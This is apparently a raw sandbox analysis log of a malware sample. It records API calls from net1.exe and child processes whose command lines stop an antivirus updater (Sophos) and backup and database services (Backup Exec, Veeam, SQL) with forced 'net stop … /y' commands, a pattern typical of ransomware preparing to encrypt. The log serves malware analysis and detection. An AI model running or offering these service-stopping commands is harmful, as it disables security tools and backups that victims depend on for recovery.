returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc1 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET LOCALGROUP\r\n", _MaxCount=0x10) returned 7 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x16 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET PAUSE\r\nservi", _MaxCount=0x10) returned 3 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x33 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET SESSION\r\n[\\\\", _MaxCount=0x10) returned 15 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x234 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET SHARE\r\nshare", _MaxCount=0x10) returned 12 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x13 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START BROWSE", _MaxCount=0x10) returned 14 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START CLIPBO", _MaxCount=0x10) returned 14 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START EVENTL", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x415510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START MESSEN", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x415510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="甐A⡋盺\x1f唐A\x1f") returned 0x15 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START NET LO", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x417510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f甐A\x1f") returned 0x16 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START RPCLOC", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x419510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x11 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START RPCSS\r", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x419510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x14 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START SCHEDU", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x419510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x12 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START SERVER", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x419510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xf [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START UPS\r\n", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x419510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x17 [0115.002] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START WORKST", _MaxCount=0x10) returned 14 [0115.002] LocalFree (hMem=0x419510) returned 0x0 [0115.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x18 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START\r\n[serv", _MaxCount=0x10) returned 14 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x2a [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET STATISTICS\r\n", _MaxCount=0x10) returned 14 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x15 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET STOP\r\nservic", _MaxCount=0x10) returned 19 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x58 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET TIME\r\n\r\n[\\\\c", _MaxCount=0x10) returned -1 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x184 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET USE\r\n[device", _MaxCount=0x10) returned -2 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xc7 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET USER\r\n[usern", _MaxCount=0x10) returned -2 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x47 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET VIEW\r\n[\\\\com", _MaxCount=0x10) returned -3 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xc2 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET\r\n [ ACCOU", _MaxCount=0x10) returned 19 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x319 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="SERVICES\r\nNET ST", _MaxCount=0x10) returned -5 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x483 [0115.003] _wcsnicmp (_String1="NET stop “Sophos", _String2="SYNTAX\r\nThe foll", _MaxCount=0x10) returned -5 [0115.003] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xa86 [0115.004] _wcsnicmp (_String1="NET stop “Sophos", _String2="NAMES\r\nThe follo", _MaxCount=0x10) returned 4 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x54 [0115.004] _wcsnicmp (_String1="NET stop “Sophos", _String2="\r\nFor more infor", _MaxCount=0x10) returned 97 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xad [0115.004] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x2e [0115.004] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x7d [0115.004] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x26 [0115.004] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x19 [0115.004] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x1b [0115.004] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0115.004] LocalFree (hMem=0x419510) returned 0x0 [0115.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xbe [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x33 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x19 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0xc1 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x16 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x33 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x234 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x13 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x14 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x14 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x15 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.005] LocalFree (hMem=0x419510) returned 0x0 [0115.005] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x15 [0115.005] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x419510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="锐A⡋盺\x1f锐A\x1f") returned 0x16 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x419510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="䰘A⡋盺\x1f锐A\x1f") returned 0x11 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x414c18) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f䰘A\x1f") returned 0x14 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x41b510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f딐A\x1f") returned 0x12 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x41b510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f딐A\x1f") returned 0xf [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x41b510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f딐A\x1f") returned 0x17 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x41b510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f딐A\x1f") returned 0x18 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x41b510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f딐A\x1f") returned 0x2a [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0115.006] LocalFree (hMem=0x41b510) returned 0x0 [0115.006] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="딐A⡋盺\x1f딐A\x1f") returned 0x15 [0115.006] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0115.006] GetFileType (hFile=0x0) returned 0x0 [0115.006] GetConsoleOutputCP () returned 0x1b5 [0115.007] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0115.007] malloc (_Size=0x16) returned 0x6a26d0 [0115.007] GetConsoleOutputCP () returned 0x1b5 [0115.007] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x6a26d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0115.007] WriteFile (in: hFile=0x0, lpBuffer=0x6a26d0, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x1ff20c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff20c, lpOverlapped=0x0) returned 0 [0115.007] free (_Block=0x6a26d0) [0115.007] LocalFree (hMem=0x41b510) returned 0x0 [0115.007] NetApiBufferFree (Buffer=0x411b10) returned 0x0 [0115.008] NetApiBufferFree (Buffer=0x411b28) returned 0x0 [0115.008] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Sophos AutoUpdate Service” /y" [0115.008] exit (_Code=1) Process: id = "198" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6ae49000" os_pid = "0x1394" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 590 os_tid = 0x1398 Process: id = "199" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7214b000" os_pid = "0x13a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MsDtsServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 593 os_tid = 0x13a8 Process: id = "200" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6ad50000" os_pid = "0x13d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamCloudSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 594 os_tid = 0x13d8 Process: id = "201" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6c655000" os_pid = "0x13dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SMTPSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 595 os_tid = 0x13e0 Process: id = "202" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x200bc000" os_pid = "0x13e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "86" os_parent_pid = "0xf20" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], 